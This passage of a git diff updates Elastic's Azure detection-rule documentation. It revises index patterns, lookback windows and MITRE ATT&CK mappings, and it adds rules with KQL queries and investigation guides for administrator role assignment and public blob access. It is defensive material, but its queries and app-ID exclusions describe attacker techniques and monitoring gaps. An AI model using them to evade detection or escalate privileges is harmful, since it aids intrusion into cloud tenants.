logs-azure.signinlogs-* *Severity*: medium @@ -35,7 +35,7 @@ Identifies rare Azure Entra ID apps IDs requesting authentication on-behalf-of a * Tactic: Initial Access * Resources: Investigation Guide -*Version*: 3 +*Version*: 4 *Rule authors*: @@ -124,6 +124,24 @@ event.dataset: "azure.signinlogs" and event.category: "authentication" and azure.signinlogs.properties.user_type: "Member" and not azure.signinlogs.properties.client_app_used: "Browser" and not source.as.organization.name: "MICROSOFT-CORP-MSN-AS-BLOCK" + and not azure.signinlogs.properties.app_id: ( + "1b3c667f-cde3-4090-b60b-3d2abd0117f0" or + "26a7ee05-5602-4d76-a7ba-eae8b7b67941" or + "4b0964e4-58f1-47f4-a552-e2e1fc56dcd7" or + "ecd6b820-32c2-49b6-98a6-444530e5a77a" or + "268761a2-03f3-40df-8a8b-c3db24145b6b" or + "fc0f3af4-6835-4174-b806-f7db311fd2f3" or + "de50c81f-5f80-4771-b66b-cebd28ccdfc1" or + "ab9b8c07-8f02-4f72-87fa-80105867a763" or + "6f7e0f60-9401-4f5b-98e2-cf15bd5fd5e3" or + "d7b530a4-7680-4c23-a8bf-c52c121d2e87" or + "52c2e0b5-c7b6-4d11-a89c-21e42bcec444" or + "38aa3b87-a06d-4817-b275-7a316988d93b" or + "27922004-5251-4030-b22d-91ecd9a37ea4" or + "9ba1a5c7-f17a-4de9-a1f1-6178c8d51223" or + "cab96880-db5b-4e15-90a7-f3f1d62ffe39" or + "3a4d129e-7f50-4e0d-a7fd-033add0a29f4" + ) ---------------------------------- @@ -141,3 +159,11 @@ event.dataset: "azure.signinlogs" and event.category: "authentication" ** Name: Cloud Accounts ** ID: T1078.004 ** Reference URL: https://attack.mitre.org/techniques/T1078/004/ +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: Steal Application Access Token +** ID: T1528 +** Reference URL: https://attack.mitre.org/techniques/T1528/ diff --git a/docs/detections/prebuilt-rules/rule-details/azure-event-hub-authorization-rule-created-or-updated.asciidoc b/docs/detections/prebuilt-rules/rule-details/azure-event-hub-authorization-rule-created-or-updated.asciidoc index 0d49d99b5b..bedf2f64ec 100644 --- a/docs/detections/prebuilt-rules/rule-details/azure-event-hub-authorization-rule-created-or-updated.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/azure-event-hub-authorization-rule-created-or-updated.asciidoc @@ -7,8 +7,8 @@ Identifies when an Event Hub Authorization Rule is created or updated in Azure. *Rule indices*: +* logs-azure.activitylogs-* * filebeat-* -* logs-azure* *Severity*: medium @@ -16,7 +16,7 @@ Identifies when an Event Hub Authorization Rule is created or updated in Azure. *Runs every*: 5m -*Searches indices from*: now-25m ({ref}/common-options.html#date-math[Date Math format], see also <>) +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) *Maximum alerts per execution*: 100 @@ -29,10 +29,10 @@ Identifies when an Event Hub Authorization Rule is created or updated in Azure. * Domain: Cloud * Data Source: Azure * Use Case: Log Auditing -* Tactic: Collection +* Tactic: Persistence * Resources: Investigation Guide -*Version*: 106 +*Version*: 107 *Rule authors*: @@ -106,18 +106,22 @@ event.dataset:azure.activitylogs and azure.activitylogs.operation_name:"MICROSOF *Framework*: MITRE ATT&CK^TM^ * Tactic: -** Name: Collection -** ID: TA0009 -** Reference URL: https://attack.mitre.org/tactics/TA0009/ +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ * Technique: -** Name: Data from Cloud Storage -** ID: T1530 -** Reference URL: https://attack.mitre.org/techniques/T1530/ +** Name: Account Manipulation +** ID: T1098 +** Reference URL: https://attack.mitre.org/techniques/T1098/ * Tactic: -** Name: Exfiltration -** ID: TA0010 -** Reference URL: https://attack.mitre.org/tactics/TA0010/ +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ * Technique: -** Name: Transfer Data to Cloud Account -** ID: T1537 -** Reference URL: https://attack.mitre.org/techniques/T1537/ +** Name: Unsecured Credentials +** ID: T1552 +** Reference URL: https://attack.mitre.org/techniques/T1552/ +* Sub-technique: +** Name: Cloud Instance Metadata API +** ID: T1552.005 +** Reference URL: https://attack.mitre.org/techniques/T1552/005/ diff --git a/docs/detections/prebuilt-rules/rule-details/azure-event-hub-deletion.asciidoc b/docs/detections/prebuilt-rules/rule-details/azure-event-hub-deletion.asciidoc index 14cc99dbed..56dc19eef1 100644 --- a/docs/detections/prebuilt-rules/rule-details/azure-event-hub-deletion.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/azure-event-hub-deletion.asciidoc @@ -7,8 +7,8 @@ Identifies an Event Hub deletion in Azure. An Event Hub is an event processing s *Rule indices*: +* logs-azure.activitylogs-* * filebeat-* -* logs-azure* *Severity*: medium @@ -16,7 +16,7 @@ Identifies an Event Hub deletion in Azure. An Event Hub is an event processing s *Runs every*: 5m -*Searches indices from*: now-25m ({ref}/common-options.html#date-math[Date Math format], see also <>) +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) *Maximum alerts per execution*: 100 @@ -34,7 +34,7 @@ Identifies an Event Hub deletion in Azure. An Event Hub is an event processing s * Tactic: Defense Evasion * Resources: Investigation Guide -*Version*: 105 +*Version*: 106 *Rule authors*: @@ -117,6 +117,6 @@ event.dataset:azure.activitylogs and azure.activitylogs.operation_name:"MICROSOF ** ID: T1562 ** Reference URL: https://attack.mitre.org/techniques/T1562/ * Sub-technique: -** Name: Disable or Modify Tools -** ID: T1562.001 -** Reference URL: https://attack.mitre.org/techniques/T1562/001/ +** Name: Disable or Modify Cloud Logs +** ID: T1562.008 +** Reference URL: https://attack.mitre.org/techniques/T1562/008/ diff --git a/docs/detections/prebuilt-rules/rule-details/azure-external-guest-user-invitation.asciidoc b/docs/detections/prebuilt-rules/rule-details/azure-external-guest-user-invitation.asciidoc index 37087b5e8f..87efba1daa 100644 --- a/docs/detections/prebuilt-rules/rule-details/azure-external-guest-user-invitation.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/azure-external-guest-user-invitation.asciidoc @@ -7,8 +7,8 @@ Identifies an invitation to an external user in Azure Active Directory (AD). Azu *Rule indices*: +* logs-azure.auditlogs-* * filebeat-* -* logs-azure* *Severity*: low @@ -16,7 +16,7 @@ Identifies an invitation to an external user in Azure Active Directory (AD). Azu *Runs every*: 5m -*Searches indices from*: now-25m ({ref}/common-options.html#date-math[Date Math format], see also <>) +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) *Maximum alerts per execution*: 100 @@ -32,7 +32,7 @@ Identifies an invitation to an external user in Azure Active Directory (AD). Azu * Tactic: Initial Access * Resources: Investigation Guide -*Version*: 105 +*Version*: 106 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/azure-firewall-policy-deletion.asciidoc b/docs/detections/prebuilt-rules/rule-details/azure-firewall-policy-deletion.asciidoc index d785670cea..b309e3d360 100644 --- a/docs/detections/prebuilt-rules/rule-details/azure-firewall-policy-deletion.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/azure-firewall-policy-deletion.asciidoc @@ -7,8 +7,8 @@ Identifies the deletion of a firewall policy in Azure. An adversary may delete a *Rule indices*: +* logs-azure.activitylogs-* * filebeat-* -* logs-azure* *Severity*: low @@ -16,7 +16,7 @@ Identifies the deletion of a firewall policy in Azure. An adversary may delete a *Runs every*: 5m -*Searches indices from*: now-25m ({ref}/common-options.html#date-math[Date Math format], see also <>) +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) *Maximum alerts per execution*: 100 @@ -32,7 +32,7 @@ Identifies the deletion of a firewall policy in Azure. An adversary may delete a * Tactic: Defense Evasion * Resources: Investigation Guide -*Version*: 105 +*Version*: 106 *Rule authors*: @@ -115,6 +115,6 @@ event.dataset:azure.activitylogs and azure.activitylogs.operation_name:"MICROSOF ** ID: T1562 ** Reference URL: https://attack.mitre.org/techniques/T1562/ * Sub-technique: -** Name: Disable or Modify Tools -** ID: T1562.001 -** Reference URL: https://attack.mitre.org/techniques/T1562/001/ +** Name: Disable or Modify Cloud Firewall +** ID: T1562.007 +** Reference URL: https://attack.mitre.org/techniques/T1562/007/ diff --git a/docs/detections/prebuilt-rules/rule-details/azure-frontdoor-web-application-firewall-waf-policy-deleted.asciidoc b/docs/detections/prebuilt-rules/rule-details/azure-frontdoor-web-application-firewall-waf-policy-deleted.asciidoc index 31db43231d..13250e674a 100644 --- a/docs/detections/prebuilt-rules/rule-details/azure-frontdoor-web-application-firewall-waf-policy-deleted.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/azure-frontdoor-web-application-firewall-waf-policy-deleted.asciidoc @@ -7,8 +7,8 @@ Identifies the deletion of a Frontdoor Web Application Firewall (WAF) Policy in *Rule indices*: +* logs-azure.activitylogs-* * filebeat-* -* logs-azure* *Severity*: low @@ -16,7 +16,7 @@ Identifies the deletion of a Frontdoor Web Application Firewall (WAF) Policy in *Runs every*: 5m -*Searches indices from*: now-25m ({ref}/common-options.html#date-math[Date Math format], see also <>) +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) *Maximum alerts per execution*: 100 @@ -32,7 +32,7 @@ Identifies the deletion of a Frontdoor Web Application Firewall (WAF) Policy in * Tactic: Defense Evasion * Resources: Investigation Guide -*Version*: 105 +*Version*: 106 *Rule authors*: @@ -114,6 +114,6 @@ event.dataset:azure.activitylogs and azure.activitylogs.operation_name:"MICROSOF ** ID: T1562 ** Reference URL: https://attack.mitre.org/techniques/T1562/ * Sub-technique: -** Name: Disable or Modify Tools -** ID: T1562.001 -** Reference URL: https://attack.mitre.org/techniques/T1562/001/ +** Name: Disable or Modify Cloud Firewall +** ID: T1562.007 +** Reference URL: https://attack.mitre.org/techniques/T1562/007/ diff --git a/docs/detections/prebuilt-rules/rule-details/azure-full-network-packet-capture-detected.asciidoc b/docs/detections/prebuilt-rules/rule-details/azure-full-network-packet-capture-detected.asciidoc index c310b576fc..5ae32757d7 100644 --- a/docs/detections/prebuilt-rules/rule-details/azure-full-network-packet-capture-detected.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/azure-full-network-packet-capture-detected.asciidoc @@ -7,8 +7,8 @@ Identifies potential full network packet capture in Azure. Packet Capture is an *Rule indices*: +* logs-azure.activitylogs-* * filebeat-* -* logs-azure* *Severity*: medium @@ -16,7 +16,7 @@ Identifies potential full network packet capture in Azure. Packet Capture is an *Runs every*: 5m -*Searches indices from*: now-25m ({ref}/common-options.html#date-math[Date Math format], see also <>) +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) *Maximum alerts per execution*: 100 @@ -31,7 +31,7 @@ Identifies potential full network packet capture in Azure. Packet Capture is an * Tactic: Credential Access * Resources: Investigation Guide -*Version*: 106 +*Version*: 107 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/azure-global-administrator-role-addition-to-pim-user.asciidoc b/docs/detections/prebuilt-rules/rule-details/azure-global-administrator-role-addition-to-pim-user.asciidoc index 7ded2a49b7..439f849801 100644 --- a/docs/detections/prebuilt-rules/rule-details/azure-global-administrator-role-addition-to-pim-user.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/azure-global-administrator-role-addition-to-pim-user.asciidoc @@ -7,8 +7,8 @@ Identifies an Azure Active Directory (AD) Global Administrator role addition to *Rule indices*: +* logs-azure.auditlogs-* * filebeat-* -* logs-azure* *Severity*: high @@ -32,7 +32,7 @@ Identifies an Azure Active Directory (AD) Global Administrator role addition to * Tactic: Persistence * Resources: Investigation Guide -*Version*: 105 +*Version*: 106 *Rule authors*: @@ -118,3 +118,7 @@ event.dataset:azure.auditlogs and azure.auditlogs.properties.category:RoleManage ** Name: Account Manipulation ** ID: T1098 ** Reference URL: https://attack.mitre.org/techniques/T1098/ +* Sub-technique: +** Name: Additional Cloud Roles +** ID: T1098.003 +** Reference URL: https://attack.mitre.org/techniques/T1098/003/ diff --git a/docs/detections/prebuilt-rules/rule-details/azure-kubernetes-events-deleted.asciidoc b/docs/detections/prebuilt-rules/rule-details/azure-kubernetes-events-deleted.asciidoc index e9e7fd6a85..bff3ccc69c 100644 --- a/docs/detections/prebuilt-rules/rule-details/azure-kubernetes-events-deleted.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/azure-kubernetes-events-deleted.asciidoc @@ -7,8 +7,8 @@ Identifies when events are deleted in Azure Kubernetes. Kubernetes events are ob *Rule indices*: +* logs-azure.activitylogs-* * filebeat-* -* logs-azure* *Severity*: medium @@ -16,7 +16,7 @@ Identifies when events are deleted in Azure Kubernetes. Kubernetes events are ob *Runs every*: 5m -*Searches indices from*: now-25m ({ref}/common-options.html#date-math[Date Math format], see also <>) +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) *Maximum alerts per execution*: 100 @@ -32,7 +32,7 @@ Identifies when events are deleted in Azure Kubernetes. Kubernetes events are ob * Tactic: Defense Evasion * Resources: Investigation Guide -*Version*: 105 +*Version*: 106 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/azure-kubernetes-pods-deleted.asciidoc b/docs/detections/prebuilt-rules/rule-details/azure-kubernetes-pods-deleted.asciidoc index f1c74d2071..bc753a6644 100644 --- a/docs/detections/prebuilt-rules/rule-details/azure-kubernetes-pods-deleted.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/azure-kubernetes-pods-deleted.asciidoc @@ -7,8 +7,8 @@ Identifies the deletion of Azure Kubernetes Pods. Adversaries may delete a Kuber *Rule indices*: +* logs-azure.activitylogs-* * filebeat-* -* logs-azure* *Severity*: medium @@ -16,7 +16,7 @@ Identifies the deletion of Azure Kubernetes Pods. Adversaries may delete a Kuber *Runs every*: 5m -*Searches indices from*: now-25m ({ref}/common-options.html#date-math[Date Math format], see also <>) +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) *Maximum alerts per execution*: 100 @@ -32,7 +32,7 @@ Identifies the deletion of Azure Kubernetes Pods. Adversaries may delete a Kuber * Tactic: Impact * Resources: Investigation Guide -*Version*: 105 +*Version*: 106 *Rule authors*: @@ -110,3 +110,11 @@ event.outcome:(Success or success) ** Name: Impact ** ID: TA0040 ** Reference URL: https://attack.mitre.org/tactics/TA0040/ +* Technique: +** Name: Service Stop +** ID: T1489 +** Reference URL: https://attack.mitre.org/techniques/T1489/ +* Technique: +** Name: System Shutdown/Reboot +** ID: T1529 +** Reference URL: https://attack.mitre.org/techniques/T1529/ diff --git a/docs/detections/prebuilt-rules/rule-details/azure-kubernetes-rolebindings-created.asciidoc b/docs/detections/prebuilt-rules/rule-details/azure-kubernetes-rolebindings-created.asciidoc index 188cff5e57..810f1cf2d4 100644 --- a/docs/detections/prebuilt-rules/rule-details/azure-kubernetes-rolebindings-created.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/azure-kubernetes-rolebindings-created.asciidoc @@ -7,8 +7,8 @@ Identifies the creation of role binding or cluster role bindings. You can assign *Rule indices*: +* logs-azure.activitylogs-* * filebeat-* -* logs-azure* *Severity*: low @@ -16,7 +16,7 @@ Identifies the creation of role binding or cluster role bindings. You can assign *Runs every*: 5m -*Searches indices from*: now-20m ({ref}/common-options.html#date-math[Date Math format], see also <>) +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) *Maximum alerts per execution*: 100 @@ -33,7 +33,7 @@ Identifies the creation of role binding or cluster role bindings. You can assign * Tactic: Privilege Escalation * Resources: Investigation Guide -*Version*: 105 +*Version*: 106 *Rule authors*: @@ -113,3 +113,19 @@ event.outcome:(Success or success) ** Name: Privilege Escalation ** ID: TA0004 ** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Valid Accounts +** ID: T1078 +** Reference URL: https://attack.mitre.org/techniques/T1078/ +* Sub-technique: +** Name: Cloud Accounts +** ID: T1078.004 +** Reference URL: https://attack.mitre.org/techniques/T1078/004/ +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Account Manipulation +** ID: T1098 +** Reference URL: https://attack.mitre.org/techniques/T1098/ diff --git a/docs/detections/prebuilt-rules/rule-details/azure-network-watcher-deletion.asciidoc b/docs/detections/prebuilt-rules/rule-details/azure-network-watcher-deletion.asciidoc index cd152a2154..b554236bb9 100644 --- a/docs/detections/prebuilt-rules/rule-details/azure-network-watcher-deletion.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/azure-network-watcher-deletion.asciidoc @@ -7,8 +7,8 @@ Identifies the deletion of a Network Watcher in Azure. Network Watchers are used *Rule indices*: +* logs-azure.activitylogs-* * filebeat-* -* logs-azure* *Severity*: medium @@ -16,7 +16,7 @@ Identifies the deletion of a Network Watcher in Azure. Network Watchers are used *Runs every*: 5m -*Searches indices from*: now-25m ({ref}/common-options.html#date-math[Date Math format], see also <>) +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) *Maximum alerts per execution*: 100 @@ -32,7 +32,7 @@ Identifies the deletion of a Network Watcher in Azure. Network Watchers are used * Tactic: Defense Evasion * Resources: Investigation Guide -*Version*: 105 +*Version*: 106 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/azure-privilege-identity-management-role-modified.asciidoc b/docs/detections/prebuilt-rules/rule-details/azure-privilege-identity-management-role-modified.asciidoc index 72a2f47cea..449abbf770 100644 --- a/docs/detections/prebuilt-rules/rule-details/azure-privilege-identity-management-role-modified.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/azure-privilege-identity-management-role-modified.asciidoc @@ -7,8 +7,8 @@ Azure Active Directory (AD) Privileged Identity Management (PIM) is a service th *Rule indices*: +* logs-azure.auditlogs-* * filebeat-* -* logs-azure* *Severity*: medium @@ -16,7 +16,7 @@ Azure Active Directory (AD) Privileged Identity Management (PIM) is a service th *Runs every*: 5m -*Searches indices from*: now-25m ({ref}/common-options.html#date-math[Date Math format], see also <>) +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) *Maximum alerts per execution*: 100 @@ -33,7 +33,7 @@ Azure Active Directory (AD) Privileged Identity Management (PIM) is a service th * Resources: Investigation Guide * Tactic: Persistence -*Version*: 107 +*Version*: 108 *Rule authors*: @@ -117,9 +117,13 @@ event.dataset:azure.auditlogs and azure.auditlogs.operation_name:"Update role se ** ID: TA0003 ** Reference URL: https://attack.mitre.org/tactics/TA0003/ * Technique: -** Name: Valid Accounts -** ID: T1078 -** Reference URL: https://attack.mitre.org/techniques/T1078/ +** Name: Account Manipulation +** ID: T1098 +** Reference URL: https://attack.mitre.org/techniques/T1098/ +* Sub-technique: +** Name: Additional Cloud Roles +** ID: T1098.003 +** Reference URL: https://attack.mitre.org/techniques/T1098/003/ * Tactic: ** Name: Defense Evasion ** ID: TA0005 diff --git a/docs/detections/prebuilt-rules/rule-details/azure-rbac-built-in-administrator-roles-assigned.asciidoc b/docs/detections/prebuilt-rules/rule-details/azure-rbac-built-in-administrator-roles-assigned.asciidoc new file mode 100644 index 0000000000..c66772d7ce --- /dev/null +++ b/docs/detections/prebuilt-rules/rule-details/azure-rbac-built-in-administrator-roles-assigned.asciidoc @@ -0,0 +1,138 @@ +[[azure-rbac-built-in-administrator-roles-assigned]] +=== Azure RBAC Built-In Administrator Roles Assigned + +Identifies when a user is assigned a built-in administrator role in Azure RBAC (Role-Based Access Control). These roles provide significant privileges and can be abused by attackers for lateral movement, persistence, or privilege escalation. The privileged built-in administrator roles include Owner, Contributor, User Access Administrator, Azure File Sync Administrator, Reservations Administrator, and Role Based Access Control Administrator. + +*Rule type*: query + +*Rule indices*: + +* filebeat-* +* logs-azure.activitylogs-* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://learn.microsoft.com/en-us/azure/role-based-access-control/built-in-roles +* https://orca.security/resources/research-pod/azure-identity-access-management-iam-active-directory-ad/ +* https://www.microsoft.com/en-us/security/blog/2025/08/27/storm-0501s-evolving-techniques-lead-to-cloud-based-ransomware/ + +*Tags*: + +* Domain: Cloud +* Data Source: Azure +* Data Source: Azure Activity Logs +* Use Case: Identity and Access Audit +* Tactic: Privilege Escalation +* Resources: Investigation Guide + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and Analysis* + + + +*Investigating Azure RBAC Built-In Administrator Roles Assigned* + + +This rule identifies when a user is assigned a built-in administrator role in Azure RBAC (Role-Based Access Control). These roles provide significant privileges and can be abused by attackers for lateral movement, persistence, or privilege escalation. The privileged built-in administrator roles include Owner, Contributor, User Access Administrator, Azure File Sync Administrator, Reservations Administrator, and Role Based Access Control Administrator. Assignment can be done via the Azure portal, Azure CLI, PowerShell, or through API calls. Monitoring these assignments helps detect potential unauthorized privilege escalations. + + +*Privileged Built-In Administrator Roles* + +- Contributor: b24988ac-6180-42a0-ab88-20f7382dd24c +- Owner: 8e3af657-a8ff-443c-a75c-2fe8c4bcb635 +- Azure File Sync Administrator: 92b92042-07d9-4307-87f7-36a593fc5850 +- Reservations Administrator: a8889054-8d42-49c9-bc1c-52486c10e7cd +- Role Based Access Control Administrator: f58310d9-a9f6-439a-9e8d-f62e7b41a168 +- User Access Administrator: 18d7d88d-d35e-4fb5-a5c3-7773c20a72d9 + + +*Possible investigation steps* + + +- Identify the user who assigned the role and examine their recent activity for any suspicious actions. +- Review the source IP address and location associated with the role assignment event to assess if it aligns with expected user behavior or if it indicates potential unauthorized access. +- Check the history of role assignments for the user who was assigned the role to determine if this is a recurring pattern or a one-time event. + - Additionally, identify the lifetime of the targeted user account to determine if it is a newly created account or an existing one. +- Determine if the user assigning the role historically has the necessary permissions to assign such roles and has done so in the past. +- Investigate any recent changes or activities performed by the newly assigned administrator to identify any suspicious actions or configurations that may have been altered. +- Correlate with other logs, such as Microsoft Entra ID sign-in logs, to identify any unusual access patterns or behaviors for the user. + + +*False positive analysis* + + +- Legitimate administrators may assign built-in administrator roles during routine operations, maintenance or as required for onboarding new staff. +- Review internal tickets, change logs, or admin activity dashboards for approved operations. + + +*Response and remediation* + + +- If administrative assignment was not authorized: + - Immediately remove the built-in administrator role from the account. + - Disable or lock the account and begin credential rotation. + - Audit activity performed by the account after elevation, especially changes to role assignments and resource access. +- If suspicious: + - Notify the user and confirm whether they performed the action. + - Check for any automation or scripts that could be exploiting unused elevated access paths. + - Review conditional access and PIM (Privileged Identity Management) configurations to limit elevation without approval. +- Strengthen posture: + - Require MFA and approval for all privilege escalation actions. + - Consider enabling JIT (Just-in-Time) access with expiration. + + +==== Rule query + + +[source, js] +---------------------------------- +event.dataset: azure.activitylogs and + event.action: "MICROSOFT.AUTHORIZATION/ROLEASSIGNMENTS/WRITE" and + azure.activitylogs.properties.requestbody.properties.roleDefinitionId: + ( + *18d7d88d-d35e-4fb5-a5c3-7773c20a72d9* or + *f58310d9-a9f6-439a-9e8d-f62e7b41a168* or + *b24988ac-6180-42a0-ab88-20f7382dd24c* or + *8e3af657-a8ff-443c-a75c-2fe8c4bcb635* or + *92b92042-07d9-4307-87f7-36a593fc5850* or + *a8889054-8d42-49c9-bc1c-52486c10e7cd* + ) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Account Manipulation +** ID: T1098 +** Reference URL: https://attack.mitre.org/techniques/T1098/ +* Sub-technique: +** Name: Additional Cloud Roles +** ID: T1098.003 +** Reference URL: https://attack.mitre.org/techniques/T1098/003/ diff --git a/docs/detections/prebuilt-rules/rule-details/azure-resource-group-deletion.asciidoc b/docs/detections/prebuilt-rules/rule-details/azure-resource-group-deletion.asciidoc index 46c37eb193..29fed5f4e4 100644 --- a/docs/detections/prebuilt-rules/rule-details/azure-resource-group-deletion.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/azure-resource-group-deletion.asciidoc @@ -7,8 +7,8 @@ Identifies the deletion of a resource group in Azure, which includes all resourc *Rule indices*: +* logs-azure.activitylogs-* * filebeat-* -* logs-azure* *Severity*: medium @@ -16,7 +16,7 @@ Identifies the deletion of a resource group in Azure, which includes all resourc *Runs every*: 5m -*Searches indices from*: now-25m ({ref}/common-options.html#date-math[Date Math format], see also <>) +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) *Maximum alerts per execution*: 100 @@ -32,7 +32,7 @@ Identifies the deletion of a resource group in Azure, which includes all resourc * Tactic: Impact * Resources: Investigation Guide -*Version*: 105 +*Version*: 106 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/azure-storage-account-blob-public-access-enabled.asciidoc b/docs/detections/prebuilt-rules/rule-details/azure-storage-account-blob-public-access-enabled.asciidoc new file mode 100644 index 0000000000..fa5f1776dc --- /dev/null +++ b/docs/detections/prebuilt-rules/rule-details/azure-storage-account-blob-public-access-enabled.asciidoc @@ -0,0 +1,115 @@ +[[azure-storage-account-blob-public-access-enabled]] +=== Azure Storage Account Blob Public Access Enabled + +Identifies when Azure Storage Account Blob public access is enabled, allowing external access to blob containers. This technique was observed in cloud ransom-based campaigns where threat actors modified storage accounts to expose non-remotely accessible accounts to the internet for data exfiltration. Adversaries abuse the Microsoft.Storage/storageAccounts/write operation to modify public access settings. + +*Rule type*: new_terms + +*Rule indices*: + +* logs-azure.activitylogs-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.microsoft.com/en-us/security/blog/2025/08/27/storm-0501s-evolving-techniques-lead-to-cloud-based-ransomware/ +* https://docs.microsoft.com/en-us/azure/storage/blobs/anonymous-read-access-configure + +*Tags*: + +* Domain: Cloud +* Domain: Storage +* Data Source: Azure +* Data Source: Azure Activity Logs +* Use Case: Threat Detection +* Tactic: Collection +* Resources: Investigation Guide + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating Azure Storage Account Blob Public Access Enabled* + + +Azure Storage Accounts provide cloud storage solutions with various access control mechanisms. The public access setting, when enabled, allows anonymous internet access to blob containers, bypassing authentication requirements. Adversaries exploit this feature to expose sensitive data for exfiltration or to establish persistent external access. This detection monitors for successful modifications that enable public blob access, a technique notably used in STORM-0501 cloud ransom-based campaigns. + + +*Possible investigation steps* + + +- Review the Azure activity logs to identify the user or service principal that initiated the storage account modification by examining the principal ID, UPN and user agent fields. +- Check the specific storage account name in `azure.resource.name` to understand which storage resources were affected and assess the sensitivity of data stored there. +- Investigate the timing of the event to correlate with any other suspicious activities, such as unusual login patterns or privilege escalation attempts. +- Examine the request or response body details to understand the full scope of changes made to the storage account configuration beyond public access settings. +- Review access logs for the affected storage account to identify any subsequent data access or exfiltration attempts following the public access enablement. +- Verify if the storage account modification aligns with approved change requests or maintenance windows in your organization. +- Check for other storage accounts modified by the same principal to identify potential lateral movement or widespread configuration changes. +- Pivot into related activity for the storage account and/or container such as data deletion, encryption or further permission changes. + + +*False positive analysis* + + +- Legitimate CDN integration or public website hosting may require enabling public blob access. Document approved storage accounts used for public content delivery and create exceptions for these specific resources. +- DevOps automation tools might temporarily enable public access during deployment processes. Identify service principals used by CI/CD pipelines and consider time-based exceptions during deployment windows. +- Testing and development environments may have different access requirements. Consider filtering out non-production storage accounts if public access is acceptable in those environments. +- Migration activities might require temporary public access. Coordinate with infrastructure teams to understand planned migrations and create temporary exceptions with defined expiration dates. + + +*Response and remediation* + + +- Immediately disable public blob access on the affected storage account using Azure Portal IaC, or Azure CLI command. +- Audit all blob containers within the affected storage account to identify which data may have been exposed and assess the potential impact of the exposure. +- Review Azure Activity Logs and storage access logs to determine if any data was accessed or exfiltrated while public access was enabled. +- Rotate any credentials, keys, or sensitive data that may have been stored in the exposed blob containers. +- If unauthorized modification is confirmed, disable the compromised user account or service principal and investigate how the credentials were obtained. +- Implement Azure Policy to prevent enabling public blob access on storage accounts containing sensitive data, using built-in policy definitions for storage account public access restrictions. +- Consider implementing private endpoints for storage accounts that should never be publicly accessible, ensuring network-level isolation. + + +==== Rule query + + +[source, js] +---------------------------------- +event.dataset: "azure.activitylogs" and +event.action: "MICROSOFT.STORAGE/STORAGEACCOUNTS/WRITE" and +event.outcome: "success" and +azure.activitylogs.properties.responseBody: *\"allowBlobPublicAccess\"\:true* + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Collection +** ID: TA0009 +** Reference URL: https://attack.mitre.org/tactics/TA0009/ +* Technique: +** Name: Data from Cloud Storage +** ID: T1530 +** Reference URL: https://attack.mitre.org/techniques/T1530/ diff --git a/docs/detections/prebuilt-rules/rule-details/azure-storage-account-key-regenerated.asciidoc b/docs/detections/prebuilt-rules/rule-details/azure-storage-account-key-regenerated.asciidoc index f4a0cfbe50..8793d34972 100644 --- a/docs/detections/prebuilt-rules/rule-details/azure-storage-account-key-regenerated.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/azure-storage-account-key-regenerated.asciidoc @@ -7,8 +7,8 @@ Identifies a rotation to storage account access keys in Azure. Regenerating acce *Rule indices*: +* logs-azure.activitylogs-* * filebeat-* -* logs-azure* *Severity*: low @@ -16,7 +16,7 @@ Identifies a rotation to storage account access keys in Azure. Regenerating acce *Runs every*: 5m -*Searches indices from*: now-25m ({ref}/common-options.html#date-math[Date Math format], see also <>) 